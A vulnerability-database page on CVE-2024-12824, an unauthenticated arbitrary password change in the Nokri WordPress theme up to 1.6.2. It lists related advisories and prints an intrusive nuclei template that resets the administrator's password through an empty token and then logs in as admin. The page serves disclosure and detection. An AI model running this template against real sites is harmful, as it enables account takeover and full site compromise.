Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Nokri – Job Board WordPress Theme <= 1.6.2 - Unauthenticated Arbitrary Password Change

🗓️ 01 Jun 2026 05:38:37Reported by ProjectDiscoveryType 
nuclei
 nuclei🔗 github.com👁 28 Views

Nokri WordPress theme <= 1.6.2 allows unauthenticated password change. Critical vulnerability detected.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2024-12824
1 Mar 202507:27
circl
CNNVD		WordPress plugin Nokri 安全漏洞
1 Mar 202500:00
cnnvd
CVE		CVE-2024-12824
1 Mar 202506:39
cve
Cvelist		CVE-2024-12824 Nokri – Job Board WordPress Theme <= 1.6.2 - Unauthenticated Arbitrary Password Change
1 Mar 202506:39
cvelist
NVD		CVE-2024-12824
1 Mar 202507:15
nvd
Patchstack		WordPress Nokri theme <= 1.6.2 - Unauthenticated Arbitrary Password Change vulnerability
28 Feb 202523:06
patchstack
RedhatCVE		CVE-2024-12824
3 Mar 202507:21
redhatcve
The Hacker News		⚡ THN Weekly Recap: Alerts on Zero-Day Exploits, AI Breaches, and Crypto Heists
3 Mar 202511:58
thn
Vulnrichment		CVE-2024-12824 Nokri – Job Board WordPress Theme <= 1.6.2 - Unauthenticated Arbitrary Password Change
1 Mar 202506:39
vulnrichment
Tenable Nessus		Nokri - Job Board Theme for WordPress < 1.6.3 Arbitrary Password Change
18 Mar 202500:00
nessus
Rows per page
id: CVE-2024-12824

info:
  name: Nokri – Job Board WordPress Theme <= 1.6.2 - Unauthenticated Arbitrary Password Change
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    The Nokri – Job Board WordPress Theme theme for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.6.2. This is due to the plugin not properly checking for an empty token value prior updating their details like password. This makes it possible for unauthenticated attackers to change arbitrary user's password, including administrators, and leverage that to gain access to their account.
  impact: |
    Unauthenticated attackers can change arbitrary user passwords including administrators, enabling complete account takeover and site compromise.
  remediation: |
    Update Nokri theme to a version newer than 1.6.2.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/nokri-2/nokri-job-board-wordpress-theme-162-unauthenticated-arbitrary-password-change
    - https://themeforest.net/item/nokri-job-board-wordpress-theme/22677241
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/60a7cce0-637f-49bd-aa4a-fd7023d99a64?source=cve
    - https://github.com/20142995/nuclei-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-12824
    cwe-id: CWE-620
    epss-score: 0.48295
    epss-percentile: 0.97787
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2024,intrusive,nokri,unauth,vuln

flow: http(1) && http(2)

variables:
  username: "admin"
  userid: 1
  password: "{{randstr}}"

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        action=sb_reset_password&sb_data=token%3d-sb-uid-1%26sb_new_password={{password}}&

    matchers:
      - type: word
        part: body
        words:
          - 1|Password Changed successfully.
        internal: true

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{BaseURL}}

        log={{username}}&pwd={{password}}

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - '/wp-admin'
          - 'wordpress_logged_in'
        condition: and

      - type: status
        status:
          - 302
# digest: 4a0a004730450220797d3ce19220ef64035cd7724d77dd62f6566a9c4b6686783869be1db7e7aaf1022100c3fb67b791046d4d1eb44c7fae25bb52966ec31e203554d0376a96a30eb4f474:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Feb 2026 07:00Current
7.6High risk
Vulners AI Score7.6
CVSS 3.19.8
EPSS0.48295
SSVC
cve 2024password changewordpress themeprivilege escalationunauthenticated attack
28